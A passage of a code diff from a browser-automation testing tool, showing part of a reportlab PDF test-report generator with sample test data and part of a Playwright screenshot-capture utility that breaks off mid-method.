        story.append(Paragraph("Performance Metrics", self.styles['CustomHeading2']))

        metrics = test_data.get('performance_metrics', {})
        avg_response_time = metrics.get('avg_response_time', 'N/A')
        max_response_time = metrics.get('max_response_time', 'N/A')
        min_response_time = metrics.get('min_response_time', 'N/A')

        # Inline markup (<b>, <br/>) is interpreted by reportlab's Paragraph
        metrics_text = f"""
        <b>Average Response Time:</b> {avg_response_time}<br/>
        <b>Maximum Response Time:</b> {max_response_time}<br/>
        <b>Minimum Response Time:</b> {min_response_time}<br/>
        <b>Test Duration:</b> {test_data.get('duration', 'N/A')}
        """

        story.append(Paragraph(metrics_text, self.styles['Normal']))

        return story
|
| 317 |
+
    def _create_detailed_test_results(self, test_data: Dict[str, Any]) -> List:
        """Create the detailed test results section.

        Emits one header plus a details table per test case, and an error
        paragraph for cases that carry an ``error_message``.

        Args:
            test_data: Aggregated test-run data; reads the 'test_cases' list
                (each entry is a dict of name/status/duration/... fields).

        Returns:
            A list of reportlab flowables for this section.
        """
        story = []

        story.append(Paragraph("Detailed Test Results", self.styles['CustomHeading1']))
        story.append(Spacer(1, 12))

        test_cases = test_data.get('test_cases', [])

        for i, test_case in enumerate(test_cases, 1):
            # Test case header
            story.append(Paragraph(f"Test Case {i}: {test_case.get('name', 'Unnamed Test')}", self.styles['CustomHeading2']))

            # Test details (label / value rows)
            details = [
                ["Status:", test_case.get('status', 'Unknown')],
                ["Duration:", test_case.get('duration', 'N/A')],
                ["Description:", test_case.get('description', 'No description available')],
                ["Expected Result:", test_case.get('expected_result', 'N/A')],
                ["Actual Result:", test_case.get('actual_result', 'N/A')]
            ]

            details_table = Table(details, colWidths=[1.5*inch, 4*inch])
            details_table.setStyle(TableStyle([
                # Label column: light-grey background, bold font
                ('BACKGROUND', (0, 0), (0, -1), colors.HexColor('#F8F9FA')),
                ('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
                ('ALIGN', (0, 0), (0, -1), 'LEFT'),
                ('ALIGN', (1, 0), (1, -1), 'LEFT'),
                ('FONTNAME', (0, 0), (0, -1), 'Helvetica-Bold'),
                ('FONTSIZE', (0, 0), (-1, -1), 10),
                ('BOTTOMPADDING', (0, 0), (-1, -1), 6),
                ('BACKGROUND', (1, 0), (1, -1), colors.white),
            ]))

            story.append(details_table)

            # Error details if any
            if test_case.get('error_message'):
                story.append(Spacer(1, 6))
                story.append(Paragraph("Error Details:", self.styles['CustomHeading2']))
                story.append(Paragraph(test_case.get('error_message', ''), self.styles['Normal']))

            story.append(Spacer(1, 20))

        return story
|
| 363 |
+
def _create_screenshots_section(self, test_data: Dict[str, Any]) -> List:
|
| 364 |
+
"""Create the screenshots section."""
|
| 365 |
+
story = []
|
| 366 |
+
|
| 367 |
+
story.append(Paragraph("Screenshots and Visual Evidence", self.styles['CustomHeading1']))
|
| 368 |
+
story.append(Spacer(1, 12))
|
| 369 |
+
|
| 370 |
+
screenshots = test_data.get('screenshots', [])
|
| 371 |
+
|
| 372 |
+
if not screenshots:
|
| 373 |
+
story.append(Paragraph("No screenshots were captured during this testing session.", self.styles['Normal']))
|
| 374 |
+
return story
|
| 375 |
+
|
| 376 |
+
for i, screenshot in enumerate(screenshots, 1):
|
| 377 |
+
story.append(Paragraph(f"Screenshot {i}: {screenshot.get('description', 'Test Screenshot')}", self.styles['CustomHeading2']))
|
| 378 |
+
story.append(Spacer(1, 6))
|
| 379 |
+
|
| 380 |
+
# Add screenshot if path exists
|
| 381 |
+
screenshot_path = screenshot.get('path')
|
| 382 |
+
if screenshot_path and os.path.exists(screenshot_path):
|
| 383 |
+
try:
|
| 384 |
+
img = Image(screenshot_path, width=6*inch, height=4*inch)
|
| 385 |
+
story.append(img)
|
| 386 |
+
except Exception as e:
|
| 387 |
+
story.append(Paragraph(f"Error loading screenshot: {str(e)}", self.styles['Normal']))
|
| 388 |
+
else:
|
| 389 |
+
story.append(Paragraph("Screenshot not available", self.styles['Normal']))
|
| 390 |
+
|
| 391 |
+
story.append(Spacer(1, 12))
|
| 392 |
+
|
| 393 |
+
return story
|
| 394 |
+
|
| 395 |
+
def _create_bugs_section(self, test_data: Dict[str, Any]) -> List:
|
| 396 |
+
"""Create the bugs and issues section."""
|
| 397 |
+
story = []
|
| 398 |
+
|
| 399 |
+
story.append(Paragraph("Identified Bugs and Issues", self.styles['CustomHeading1']))
|
| 400 |
+
story.append(Spacer(1, 12))
|
| 401 |
+
|
| 402 |
+
bugs = test_data.get('bugs', [])
|
| 403 |
+
|
| 404 |
+
if not bugs:
|
| 405 |
+
story.append(Paragraph("No bugs or issues were identified during this testing session.", self.styles['Normal']))
|
| 406 |
+
return story
|
| 407 |
+
|
| 408 |
+
for i, bug in enumerate(bugs, 1):
|
| 409 |
+
story.append(Paragraph(f"Bug {i}: {bug.get('title', 'Untitled Bug')}", self.styles['CustomHeading2']))
|
| 410 |
+
|
| 411 |
+
bug_details = [
|
| 412 |
+
["Severity:", bug.get('severity', 'Unknown')],
|
| 413 |
+
["Status:", bug.get('status', 'Open')],
|
| 414 |
+
["Description:", bug.get('description', 'No description available')],
|
| 415 |
+
["Steps to Reproduce:", bug.get('steps_to_reproduce', 'N/A')],
|
| 416 |
+
["Expected Behavior:", bug.get('expected_behavior', 'N/A')],
|
| 417 |
+
["Actual Behavior:", bug.get('actual_behavior', 'N/A')]
|
| 418 |
+
]
|
| 419 |
+
|
| 420 |
+
bug_table = Table(bug_details, colWidths=[1.5*inch, 4*inch])
|
| 421 |
+
bug_table.setStyle(TableStyle([
|
| 422 |
+
('BACKGROUND', (0, 0), (0, -1), colors.HexColor('#F8F9FA')),
|
| 423 |
+
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
|
| 424 |
+
('ALIGN', (0, 0), (0, -1), 'LEFT'),
|
| 425 |
+
('ALIGN', (1, 0), (1, -1), 'LEFT'),
|
| 426 |
+
('FONTNAME', (0, 0), (0, -1), 'Helvetica-Bold'),
|
| 427 |
+
('FONTSIZE', (0, 0), (-1, -1), 10),
|
| 428 |
+
('BOTTOMPADDING', (0, 0), (-1, -1), 6),
|
| 429 |
+
('BACKGROUND', (1, 0), (1, -1), colors.white),
|
| 430 |
+
]))
|
| 431 |
+
|
| 432 |
+
story.append(bug_table)
|
| 433 |
+
story.append(Spacer(1, 20))
|
| 434 |
+
|
| 435 |
+
return story
|
| 436 |
+
|
| 437 |
+
def _create_recommendations_section(self, test_data: Dict[str, Any]) -> List:
|
| 438 |
+
"""Create the recommendations section."""
|
| 439 |
+
story = []
|
| 440 |
+
|
| 441 |
+
story.append(Paragraph("Recommendations and Next Steps", self.styles['CustomHeading1']))
|
| 442 |
+
story.append(Spacer(1, 12))
|
| 443 |
+
|
| 444 |
+
recommendations = test_data.get('recommendations', [])
|
| 445 |
+
|
| 446 |
+
if not recommendations:
|
| 447 |
+
# Generate default recommendations based on test results
|
| 448 |
+
success_rate = test_data.get('success_rate', 0)
|
| 449 |
+
failed_tests = test_data.get('failed_tests', 0)
|
| 450 |
+
error_tests = test_data.get('error_tests', 0)
|
| 451 |
+
|
| 452 |
+
recommendations = []
|
| 453 |
+
|
| 454 |
+
if success_rate < 80:
|
| 455 |
+
recommendations.append("Focus on improving test stability and addressing failed test cases")
|
| 456 |
+
|
| 457 |
+
if failed_tests > 0:
|
| 458 |
+
recommendations.append("Investigate and fix the identified functional issues")
|
| 459 |
+
|
| 460 |
+
if error_tests > 0:
|
| 461 |
+
recommendations.append("Review and resolve technical errors in the test environment")
|
| 462 |
+
|
| 463 |
+
recommendations.extend([
|
| 464 |
+
"Implement continuous integration to catch issues early",
|
| 465 |
+
"Consider adding more comprehensive test coverage",
|
| 466 |
+
"Regular monitoring and maintenance of test automation suite"
|
| 467 |
+
])
|
| 468 |
+
|
| 469 |
+
for i, recommendation in enumerate(recommendations, 1):
|
| 470 |
+
story.append(Paragraph(f"{i}. {recommendation}", self.styles['Normal']))
|
| 471 |
+
story.append(Spacer(1, 6))
|
| 472 |
+
|
| 473 |
+
return story
|
| 474 |
+
|
| 475 |
+
def _create_technical_details(self, test_data: Dict[str, Any]) -> List:
|
| 476 |
+
"""Create the technical details section."""
|
| 477 |
+
story = []
|
| 478 |
+
|
| 479 |
+
story.append(Paragraph("Technical Details", self.styles['CustomHeading1']))
|
| 480 |
+
story.append(Spacer(1, 12))
|
| 481 |
+
|
| 482 |
+
# Test environment details
|
| 483 |
+
story.append(Paragraph("Test Environment", self.styles['CustomHeading2']))
|
| 484 |
+
|
| 485 |
+
env_details = [
|
| 486 |
+
["Browser:", test_data.get('browser', 'Unknown')],
|
| 487 |
+
["Browser Version:", test_data.get('browser_version', 'Unknown')],
|
| 488 |
+
["Operating System:", test_data.get('os', 'Unknown')],
|
| 489 |
+
["Test Framework:", test_data.get('framework', 'Fagun Browser Automation Testing Agent')],
|
| 490 |
+
["Execution Time:", test_data.get('execution_time', 'N/A')],
|
| 491 |
+
["Test Data:", test_data.get('test_data_source', 'N/A')]
|
| 492 |
+
]
|
| 493 |
+
|
| 494 |
+
env_table = Table(env_details, colWidths=[2*inch, 3*inch])
|
| 495 |
+
env_table.setStyle(TableStyle([
|
| 496 |
+
('BACKGROUND', (0, 0), (0, -1), colors.HexColor('#F8F9FA')),
|
| 497 |
+
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
|
| 498 |
+
('ALIGN', (0, 0), (0, -1), 'LEFT'),
|
| 499 |
+
('ALIGN', (1, 0), (1, -1), 'LEFT'),
|
| 500 |
+
('FONTNAME', (0, 0), (0, -1), 'Helvetica-Bold'),
|
| 501 |
+
('FONTSIZE', (0, 0), (-1, -1), 10),
|
| 502 |
+
('BOTTOMPADDING', (0, 0), (-1, -1), 6),
|
| 503 |
+
('BACKGROUND', (1, 0), (1, -1), colors.white),
|
| 504 |
+
]))
|
| 505 |
+
|
| 506 |
+
story.append(env_table)
|
| 507 |
+
story.append(Spacer(1, 20))
|
| 508 |
+
|
| 509 |
+
# Additional notes
|
| 510 |
+
story.append(Paragraph("Additional Notes", self.styles['CustomHeading2']))
|
| 511 |
+
|
| 512 |
+
notes = test_data.get('notes', [
|
| 513 |
+
"This report was generated automatically by the Fagun Browser Automation Testing Agent.",
|
| 514 |
+
"All test results and screenshots are based on the actual execution data.",
|
| 515 |
+
"For questions or clarifications, please contact the test automation team."
|
| 516 |
+
])
|
| 517 |
+
|
| 518 |
+
for note in notes:
|
| 519 |
+
story.append(Paragraph(f"• {note}", self.styles['Normal']))
|
| 520 |
+
story.append(Spacer(1, 6))
|
| 521 |
+
|
| 522 |
+
return story
|
| 523 |
+
|
| 524 |
+
def _create_error_monitoring_section(self, test_data: Dict[str, Any]) -> List:
|
| 525 |
+
"""Create the error monitoring section."""
|
| 526 |
+
story = []
|
| 527 |
+
|
| 528 |
+
# Section title
|
| 529 |
+
story.append(Paragraph("🔍 Error Monitoring & Detection", self.styles['Heading1']))
|
| 530 |
+
story.append(Spacer(1, 12))
|
| 531 |
+
|
| 532 |
+
error_monitoring = test_data.get("error_monitoring", {})
|
| 533 |
+
|
| 534 |
+
if not error_monitoring or error_monitoring.get("total_errors", 0) == 0:
|
| 535 |
+
story.append(Paragraph("No errors were detected during testing.", self.styles['Normal']))
|
| 536 |
+
return story
|
| 537 |
+
|
| 538 |
+
# Error summary
|
| 539 |
+
story.append(Paragraph("Error Summary", self.styles['Heading2']))
|
| 540 |
+
story.append(Spacer(1, 6))
|
| 541 |
+
|
| 542 |
+
# Create error summary table
|
| 543 |
+
error_summary_data = [
|
| 544 |
+
["Metric", "Count"],
|
| 545 |
+
["Total Errors", str(error_monitoring.get("total_errors", 0))],
|
| 546 |
+
["Console Errors", str(error_monitoring.get("console_errors", 0))],
|
| 547 |
+
["JavaScript Errors", str(error_monitoring.get("js_errors", 0))],
|
| 548 |
+
["Network Errors", str(error_monitoring.get("network_errors", 0))],
|
| 549 |
+
["DOM Errors", str(error_monitoring.get("dom_errors", 0))],
|
| 550 |
+
["Performance Issues", str(error_monitoring.get("performance_issues", 0))]
|
| 551 |
+
]
|
| 552 |
+
|
| 553 |
+
error_summary_table = Table(error_summary_data, colWidths=[2*inch, 1*inch])
|
| 554 |
+
error_summary_table.setStyle(TableStyle([
|
| 555 |
+
('BACKGROUND', (0, 0), (-1, 0), colors.HexColor('#2E86AB')),
|
| 556 |
+
('TEXTCOLOR', (0, 0), (-1, 0), colors.whitesmoke),
|
| 557 |
+
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
|
| 558 |
+
('FONTNAME', (0, 0), (-1, 0), 'Helvetica-Bold'),
|
| 559 |
+
('FONTSIZE', (0, 0), (-1, 0), 12),
|
| 560 |
+
('BOTTOMPADDING', (0, 0), (-1, 0), 12),
|
| 561 |
+
('BACKGROUND', (0, 1), (-1, -1), colors.beige),
|
| 562 |
+
('GRID', (0, 0), (-1, -1), 1, colors.black)
|
| 563 |
+
]))
|
| 564 |
+
|
| 565 |
+
story.append(error_summary_table)
|
| 566 |
+
story.append(Spacer(1, 12))
|
| 567 |
+
|
| 568 |
+
# Errors by type
|
| 569 |
+
errors_by_type = error_monitoring.get("errors_by_type", {})
|
| 570 |
+
if errors_by_type:
|
| 571 |
+
story.append(Paragraph("Errors by Type", self.styles['Heading2']))
|
| 572 |
+
story.append(Spacer(1, 6))
|
| 573 |
+
|
| 574 |
+
type_data = [["Error Type", "Count"]]
|
| 575 |
+
for error_type, count in errors_by_type.items():
|
| 576 |
+
type_data.append([error_type.replace('_', ' ').title(), str(count)])
|
| 577 |
+
|
| 578 |
+
type_table = Table(type_data, colWidths=[2*inch, 1*inch])
|
| 579 |
+
type_table.setStyle(TableStyle([
|
| 580 |
+
('BACKGROUND', (0, 0), (-1, 0), colors.HexColor('#2E86AB')),
|
| 581 |
+
('TEXTCOLOR', (0, 0), (-1, 0), colors.whitesmoke),
|
| 582 |
+
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
|
| 583 |
+
('FONTNAME', (0, 0), (-1, 0), 'Helvetica-Bold'),
|
| 584 |
+
('FONTSIZE', (0, 0), (-1, 0), 12),
|
| 585 |
+
('BOTTOMPADDING', (0, 0), (-1, 0), 12),
|
| 586 |
+
('BACKGROUND', (0, 1), (-1, -1), colors.beige),
|
| 587 |
+
('GRID', (0, 0), (-1, -1), 1, colors.black)
|
| 588 |
+
]))
|
| 589 |
+
|
| 590 |
+
story.append(type_table)
|
| 591 |
+
story.append(Spacer(1, 12))
|
| 592 |
+
|
| 593 |
+
# Errors by severity
|
| 594 |
+
errors_by_severity = error_monitoring.get("errors_by_severity", {})
|
| 595 |
+
if errors_by_severity:
|
| 596 |
+
story.append(Paragraph("Errors by Severity", self.styles['Heading2']))
|
| 597 |
+
story.append(Spacer(1, 6))
|
| 598 |
+
|
| 599 |
+
severity_data = [["Severity", "Count"]]
|
| 600 |
+
for severity, count in errors_by_severity.items():
|
| 601 |
+
severity_data.append([severity.title(), str(count)])
|
| 602 |
+
|
| 603 |
+
severity_table = Table(severity_data, colWidths=[2*inch, 1*inch])
|
| 604 |
+
severity_table.setStyle(TableStyle([
|
| 605 |
+
('BACKGROUND', (0, 0), (-1, 0), colors.HexColor('#2E86AB')),
|
| 606 |
+
('TEXTCOLOR', (0, 0), (-1, 0), colors.whitesmoke),
|
| 607 |
+
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
|
| 608 |
+
('FONTNAME', (0, 0), (-1, 0), 'Helvetica-Bold'),
|
| 609 |
+
('FONTSIZE', (0, 0), (-1, 0), 12),
|
| 610 |
+
('BOTTOMPADDING', (0, 0), (-1, 0), 12),
|
| 611 |
+
('BACKGROUND', (0, 1), (-1, -1), colors.beige),
|
| 612 |
+
('GRID', (0, 0), (-1, -1), 1, colors.black)
|
| 613 |
+
]))
|
| 614 |
+
|
| 615 |
+
story.append(severity_table)
|
| 616 |
+
story.append(Spacer(1, 12))
|
| 617 |
+
|
| 618 |
+
# Detailed errors
|
| 619 |
+
detailed_errors = error_monitoring.get("detailed_errors", [])
|
| 620 |
+
if detailed_errors:
|
| 621 |
+
story.append(Paragraph("Detailed Error Information", self.styles['Heading2']))
|
| 622 |
+
story.append(Spacer(1, 6))
|
| 623 |
+
|
| 624 |
+
for i, error in enumerate(detailed_errors[:10], 1): # Limit to first 10 errors
|
| 625 |
+
story.append(Paragraph(f"Error {i}: {error.get('type', 'Unknown')}", self.styles['Heading3']))
|
| 626 |
+
story.append(Paragraph(f"Message: {error.get('message', 'No message')}", self.styles['Normal']))
|
| 627 |
+
story.append(Paragraph(f"Severity: {error.get('severity', 'Unknown')}", self.styles['Normal']))
|
| 628 |
+
story.append(Paragraph(f"Timestamp: {error.get('timestamp', 'Unknown')}", self.styles['Normal']))
|
| 629 |
+
story.append(Paragraph(f"URL: {error.get('url', 'Unknown')}", self.styles['Normal']))
|
| 630 |
+
story.append(Paragraph(f"Source: {error.get('source', 'Unknown')}", self.styles['Normal']))
|
| 631 |
+
story.append(Spacer(1, 6))
|
| 632 |
+
|
| 633 |
+
if len(detailed_errors) > 10:
|
| 634 |
+
story.append(Paragraph(f"... and {len(detailed_errors) - 10} more errors", self.styles['Normal']))
|
| 635 |
+
|
| 636 |
+
return story
|
| 637 |
+
|
| 638 |
+
|
| 639 |
+
def create_sample_test_data() -> Dict[str, Any]:
    """Build a representative test-run payload for demo/report-preview use.

    The shape mirrors what the live agent produces: headline metrics,
    environment details, per-test-case records, screenshots, bugs,
    findings, recommendations and footer notes.

    Returns:
        Dict keyed exactly like a real test-run payload.
    """
    case_records = [
        {
            'name': 'Login Functionality Test',
            'status': 'PASSED',
            'duration': '45 seconds',
            'description': 'Test user login with valid credentials',
            'expected_result': 'User should be logged in successfully',
            'actual_result': 'User logged in successfully'
        },
        {
            'name': 'Form Submission Test',
            'status': 'FAILED',
            'duration': '30 seconds',
            'description': 'Test form submission with required fields',
            'expected_result': 'Form should submit successfully',
            'actual_result': 'Form submission failed with validation error',
            'error_message': 'Required field "email" was not filled'
        },
        {
            'name': 'Navigation Test',
            'status': 'ERROR',
            'duration': '15 seconds',
            'description': 'Test page navigation functionality',
            'expected_result': 'Page should navigate to target URL',
            'actual_result': 'Navigation failed due to timeout',
            'error_message': 'Page load timeout after 30 seconds'
        }
    ]

    shot_records = [
        {'description': 'Login page screenshot', 'path': 'screenshots/login_page.png'},
        {'description': 'Form validation error', 'path': 'screenshots/form_error.png'}
    ]

    bug_records = [
        {
            'title': 'Form validation not working properly',
            'severity': 'High',
            'status': 'Open',
            'description': 'Form allows submission without required fields',
            'steps_to_reproduce': '1. Navigate to form page\n2. Leave email field empty\n3. Click submit',
            'expected_behavior': 'Form should show validation error',
            'actual_behavior': 'Form submits with empty email field'
        }
    ]

    payload: Dict[str, Any] = {
        # Headline metrics.
        'duration': '2 hours 15 minutes',
        'total_tests': 15,
        'passed_tests': 12,
        'failed_tests': 2,
        'error_tests': 1,
        'success_rate': 80.0,
        'passed_percentage': 80.0,
        'failed_percentage': 13.3,
        'error_percentage': 6.7,
        # Execution environment.
        'browser': 'Chrome',
        'browser_version': '119.0.6045.105',
        'os': 'Windows 10',
        'framework': 'Fagun Browser Automation Testing Agent',
        'execution_time': '2024-01-15 14:30:00',
        'test_data_source': 'Production Environment',
        'performance_metrics': {
            'avg_response_time': '1.2 seconds',
            'max_response_time': '3.5 seconds',
            'min_response_time': '0.8 seconds'
        },
        'test_cases': case_records,
        'screenshots': shot_records,
        'bugs': bug_records,
        'key_findings': [
            'Login functionality works correctly',
            'Form validation has critical issues',
            'Navigation performance needs improvement',
            'Overall system stability is good'
        ],
        'recommendations': [
            'Fix form validation issues immediately',
            'Improve page load performance',
            'Add more comprehensive error handling',
            'Implement better user feedback for form errors'
        ],
        'notes': [
            'This report was generated automatically by the Fagun Browser Automation Testing Agent.',
            'All test results and screenshots are based on the actual execution data.',
            'For questions or clarifications, please contact the test automation team.'
        ]
    }
    return payload
|
| 729 |
+
|
| 730 |
+
|
| 731 |
+
if __name__ == "__main__":
|
| 732 |
+
# Example usage
|
| 733 |
+
generator = PDFReportGenerator()
|
| 734 |
+
sample_data = create_sample_test_data()
|
| 735 |
+
report_path = generator.generate_report(sample_data)
|
| 736 |
+
print(f"PDF report generated: {report_path}")
|
src/utils/screenshot_capture.py
ADDED
|
@@ -0,0 +1,287 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Screenshot Capture
|
| 3 |
+
==============================================================
|
| 4 |
+
|
| 5 |
+
Screenshot capture utilities for testing reports and documentation.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import os
|
| 13 |
+
import base64
|
| 14 |
+
from datetime import datetime
|
| 15 |
+
from pathlib import Path
|
| 16 |
+
from typing import Optional, Dict, Any
|
| 17 |
+
from playwright.async_api import Page
|
| 18 |
+
import logging
|
| 19 |
+
|
| 20 |
+
logger = logging.getLogger(__name__)
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
class ScreenshotCapture:
    """Captures and catalogues screenshots during test execution.

    Every capture attempt produces a metadata dict (also appended to
    ``self.screenshots`` on success) so reports can embed the images later.
    On failure the dict carries ``filename``/``path`` of ``None`` plus an
    ``error`` key with the exception text.
    """

    def __init__(self, output_dir: str = "screenshots"):
        """Create the capture helper and ensure ``output_dir`` exists.

        Args:
            output_dir: Directory (possibly nested) where PNGs are written.
        """
        self.output_dir = Path(output_dir)
        # parents=True lets callers pass nested paths like "runs/2024/shots".
        self.output_dir.mkdir(parents=True, exist_ok=True)
        self.screenshots = []  # metadata dicts, in capture order

    def _timestamped_path(self, prefix: str):
        """Return (filename, filepath) using a millisecond-resolution timestamp."""
        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S_%f")[:-3]
        filename = f"{prefix}_{timestamp}.png"
        return filename, self.output_dir / filename

    async def capture_screenshot(
        self,
        page: Page,
        description: str = "Test Screenshot",
        full_page: bool = True
    ) -> Dict[str, Any]:
        """
        Capture a screenshot of the current page.

        Args:
            page: Playwright page object
            description: Description of the screenshot
            full_page: Whether to capture full page or viewport only

        Returns:
            Dictionary containing screenshot metadata
        """
        try:
            filename, filepath = self._timestamped_path("screenshot")

            # full_page can be forwarded directly; the original if/else around
            # this call was redundant.
            await page.screenshot(path=str(filepath), full_page=full_page)

            screenshot_data = {
                "filename": filename,
                "path": str(filepath),
                "description": description,
                "timestamp": datetime.now().isoformat(),
                "url": page.url,
                "title": await page.title(),
                "full_page": full_page
            }

            self.screenshots.append(screenshot_data)
            # Fixed: previously logged a literal "(unknown)" placeholder.
            logger.info("Screenshot captured: %s", filepath)

            return screenshot_data

        except Exception as e:
            logger.error(f"Error capturing screenshot: {str(e)}")
            return {
                "filename": None,
                "path": None,
                "description": description,
                "timestamp": datetime.now().isoformat(),
                "url": page.url if page else "Unknown",
                "title": "Error",
                "full_page": full_page,
                "error": str(e)
            }

    async def capture_element_screenshot(
        self,
        page: Page,
        selector: str,
        description: str = "Element Screenshot"
    ) -> Dict[str, Any]:
        """
        Capture a screenshot of a specific element.

        Args:
            page: Playwright page object
            selector: CSS selector for the element
            description: Description of the screenshot

        Returns:
            Dictionary containing screenshot metadata
        """
        try:
            filename, filepath = self._timestamped_path("element")

            # Wait for the element so we don't snapshot a half-rendered page.
            element = await page.wait_for_selector(selector, timeout=5000)
            await element.screenshot(path=str(filepath))

            screenshot_data = {
                "filename": filename,
                "path": str(filepath),
                "description": f"{description} - Element: {selector}",
                "timestamp": datetime.now().isoformat(),
                "url": page.url,
                "title": await page.title(),
                "selector": selector,
                "type": "element"
            }

            self.screenshots.append(screenshot_data)
            # Fixed: previously logged a literal "(unknown)" placeholder.
            logger.info("Element screenshot captured: %s", filepath)

            return screenshot_data

        except Exception as e:
            logger.error(f"Error capturing element screenshot: {str(e)}")
            return {
                "filename": None,
                "path": None,
                "description": f"{description} - Element: {selector}",
                "timestamp": datetime.now().isoformat(),
                "url": page.url if page else "Unknown",
                "title": "Error",
                "selector": selector,
                "type": "element",
                "error": str(e)
            }

    async def capture_error_screenshot(
        self,
        page: Page,
        error_message: str,
        description: str = "Error Screenshot"
    ) -> Dict[str, Any]:
        """
        Capture a full-page screenshot when an error occurs.

        Args:
            page: Playwright page object
            error_message: The error message
            description: Description of the screenshot

        Returns:
            Dictionary containing screenshot metadata
        """
        try:
            filename, filepath = self._timestamped_path("error")

            await page.screenshot(path=str(filepath), full_page=True)

            screenshot_data = {
                "filename": filename,
                "path": str(filepath),
                "description": f"{description} - Error: {error_message[:50]}...",
                "timestamp": datetime.now().isoformat(),
                "url": page.url,
                "title": await page.title(),
                "error_message": error_message,
                "type": "error"
            }

            self.screenshots.append(screenshot_data)
            # Fixed: previously logged a literal "(unknown)" placeholder.
            logger.info("Error screenshot captured: %s", filepath)

            return screenshot_data

        except Exception as e:
            logger.error(f"Error capturing error screenshot: {str(e)}")
            return {
                "filename": None,
                "path": None,
                "description": f"{description} - Error: {error_message[:50]}...",
                "timestamp": datetime.now().isoformat(),
                "url": page.url if page else "Unknown",
                "title": "Error",
                "error_message": error_message,
                "type": "error",
                "error": str(e)
            }

    def get_screenshots(self) -> list:
        """Get all captured screenshots (metadata dicts, in capture order)."""
        return self.screenshots

    def clear_screenshots(self):
        """Clear the screenshots list."""
        self.screenshots = []

    def get_screenshot_summary(self) -> Dict[str, Any]:
        """Get a summary of captured screenshots.

        Returns:
            Dict with total / successful / error / element counts plus the
            raw metadata list. A capture counts as successful when it has a
            non-None ``filename``.
        """
        total_screenshots = len(self.screenshots)
        successful_screenshots = len([s for s in self.screenshots if s.get('filename')])
        error_screenshots = len([s for s in self.screenshots if s.get('type') == 'error'])
        element_screenshots = len([s for s in self.screenshots if s.get('type') == 'element'])

        return {
            "total_screenshots": total_screenshots,
            "successful_screenshots": successful_screenshots,
            "error_screenshots": error_screenshots,
            "element_screenshots": element_screenshots,
            "screenshots": self.screenshots
        }

    def save_screenshots_metadata(self, filepath: str):
        """Save screenshots metadata to a JSON file.

        Args:
            filepath: Destination path for the JSON document.
        """
        import json  # stdlib; kept local as the only method that needs it

        try:
            metadata = {
                "capture_time": datetime.now().isoformat(),
                "total_screenshots": len(self.screenshots),
                "screenshots": self.screenshots
            }

